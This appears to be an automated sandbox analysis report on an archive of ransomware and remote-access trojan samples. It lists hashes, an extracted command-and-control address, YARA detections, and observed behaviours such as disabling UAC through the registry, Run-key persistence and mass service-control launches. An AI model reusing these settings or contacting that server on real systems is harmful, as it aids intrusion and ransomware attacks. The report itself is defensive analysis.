Analysis
-
max time kernel
200s -
max time network
202s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 16:48
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00414.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00414.7z
-
Size
6.8MB
-
MD5
4ba05bc378b38b52acaadfe09cf3122e
-
SHA1
3693e47da4d01d389ea59bb4451494710fa5b17b
-
SHA256
7d3f9f20a5bcdb6e2e9d53685af5b7f46d3604d5d9a9539cf8b35c8c41addd45
-
SHA512
bef4cec704fe2a89be5594083902549e9fbf6a6d2123f26f19a4a9cb41ababea6adeb13e3c157710dbbe7d4dee1fac27b94fcfeb3e5e488af3cf62a9f4a87f03
-
SSDEEP
98304:sGntqpfpepXXmmNMQPHZk9FnTW+1O1kOeJEP41yCtaJkLBjhnEvh7k9h5KDZXXiS:sCtSepnZBk9FTW+Up4ttHKWK0KqC5
Malware Config
Extracted
warzonerat
194.68.59.48:2318
Extracted
C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt
Signatures
-
Hades Ransomware
Ransomware family attributed to Evil Corp APT first seen in late 2020.
-
Hades family
-
Hades payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/2004-298-0x0000000140000000-0x00000001401D8000-memory.dmp family_hades behavioral1/memory/2004-305-0x0000000140000000-0x00000001401D8000-memory.dmp family_hades behavioral1/memory/852-318-0x0000000140000000-0x00000001401D8000-memory.dmp family_hades behavioral1/memory/852-661-0x0000000140000000-0x00000001401D8000-memory.dmp family_hades behavioral1/memory/852-678-0x0000000140000000-0x00000001401D8000-memory.dmp family_hades behavioral1/memory/2004-679-0x0000000140000000-0x00000001401D8000-memory.dmp family_hades -
Processes:
ConnectionClient.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ConnectionClient.exe -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzonerat family
-
Processes:
resource yara_rule behavioral1/files/0x0008000000023bd9-215.dat cryptone -
Renames multiple (171) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Warzone RAT payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/4404-260-0x0000000000400000-0x00000000004B4000-memory.dmp warzonerat behavioral1/memory/4404-265-0x0000000000400000-0x00000000004B4000-memory.dmp warzonerat behavioral1/memory/1376-270-0x0000000000400000-0x00000000004B4000-memory.dmp warzonerat behavioral1/memory/1376-274-0x0000000000400000-0x00000000004B4000-memory.dmp warzonerat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ConnectionClient.exeTrojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation ConnectionClient.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe -
Executes dropped EXE 14 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exeHEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exeTrojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exeTrojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exeTrojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exeTrojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exeConnectionClient.exeTsCredentials.exeTsCredentials.exeimages.exeEnhancementTsCredentials.exepid Process 2304 HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe 748 HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe 2668 HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe 2636 HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe 2648 Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe 3756 Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe 4404 Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe 2004 Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe 3736 ConnectionClient.exe 4676 TsCredentials.exe 2528 TsCredentials.exe 1376 images.exe 852 Enhancement 2760 TsCredentials.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe" Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe -
Processes:
ConnectionClient.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ConnectionClient.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
mstsc.exedescription ioc Process File opened (read-only) \??\U: mstsc.exe File opened (read-only) \??\W: mstsc.exe File opened (read-only) \??\X: mstsc.exe File opened (read-only) \??\A: mstsc.exe File opened (read-only) \??\B: mstsc.exe File opened (read-only) \??\E: mstsc.exe File opened (read-only) \??\G: mstsc.exe File opened (read-only) \??\K: mstsc.exe File opened (read-only) \??\Z: mstsc.exe File opened (read-only) \??\R: mstsc.exe File opened (read-only) \??\S: mstsc.exe File opened (read-only) \??\I: mstsc.exe File opened (read-only) \??\J: mstsc.exe File opened (read-only) \??\L: mstsc.exe File opened (read-only) \??\N: mstsc.exe File opened (read-only) \??\O: mstsc.exe File opened (read-only) \??\M: mstsc.exe File opened (read-only) \??\Y: mstsc.exe File opened (read-only) \??\H: mstsc.exe File opened (read-only) \??\P: mstsc.exe File opened (read-only) \??\Q: mstsc.exe File opened (read-only) \??\T: mstsc.exe File opened (read-only) \??\V: mstsc.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x000e000000023bd3-77.dat autoit_exe behavioral1/files/0x0007000000023cae-218.dat autoit_exe -
Drops file in Program Files directory 64 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exedescription ioc Process File created C:\Program Files (x86)\SetupRV\commonmodulelist.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\Lua files in this folder get executed automatically.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\plugins\example-c\bla.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\plugins\example-c\bla.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\JavaServer.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\Cheat Engine.exe HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\targetver.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\targetver.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\3in1.exe HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\Metadata.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\dllmain.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\JavaServer.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Common\Pipe.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\targetver.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\CEJVMTI.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\stdafx.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\ceregreset.exe HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\commonmodulelist.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\languages\language.ini HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\Metadata.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\MonoDataCollector.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\PipeServer.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\plugins\example-c\bla.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\dllmain.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\JavaEventServer.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\targetver.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\languages\ru_RU\name.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\plugins\example-c HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\plugins\example-c\example-c.c HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\CEJVMTI.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\languages\ru_RU\name.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\CEJVMTI.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\JavaEventServer.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\MonoDataCollector.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\dllmain.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\MonoDataCollector.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Common\Pipe.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\cheatengine-i386.exe HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\donottrace.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\JavaEventServer.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\plugins\example-c\bla.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\stdafx.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\donottrace.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\languages\ru_RU HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\del.bat HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\CEJVMTI.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\stdafx.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Common\Pipe.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\stdafx.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\__tmp_rar_sfx_access_check_240672890 HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\plugins HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\stdafx.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\JavaEventServer.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\dlls\src\Mono\MonoDataCollector\PipeServer.cpp HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File created C:\Program Files (x86)\SetupRV\autorun\Lua files in this folder get executed automatically.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\del.bat HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe File opened for modification C:\Program Files (x86)\SetupRV\plugins\cepluginsdk.h HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 4972 sc.exe 2284 sc.exe 468 sc.exe 2404 sc.exe 4208 sc.exe 4956 sc.exe 2964 sc.exe 2916 sc.exe 664 sc.exe 4236 sc.exe 2964 sc.exe 4720 sc.exe 2352 sc.exe 428 sc.exe 1316 sc.exe 2352 sc.exe 4800 sc.exe 952 sc.exe 388 sc.exe 4516 sc.exe 2676 sc.exe 4364 sc.exe 1124 sc.exe 1104 sc.exe 832 sc.exe 4924 sc.exe 1916 sc.exe 3016 sc.exe 1224 sc.exe 3288 sc.exe 4644 sc.exe 3392 sc.exe 2528 sc.exe 3860 sc.exe 4500 sc.exe 3512 sc.exe 1568 sc.exe 3288 sc.exe 464 sc.exe 2180 sc.exe 3520 sc.exe 1876 sc.exe 3520 sc.exe 3404 sc.exe 3172 sc.exe 624 sc.exe 4076 sc.exe 2796 sc.exe 1596 sc.exe 4020 sc.exe 1428 sc.exe 1664 sc.exe 2804 sc.exe 2648 sc.exe 1600 sc.exe 1316 sc.exe 3016 sc.exe 1892 sc.exe 692 sc.exe 4948 sc.exe 3572 sc.exe 2256 sc.exe 3984 sc.exe 1608 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 39 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target Process procid_target 3792 748 WerFault.exe 111 4644 748 WerFault.exe 111 -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
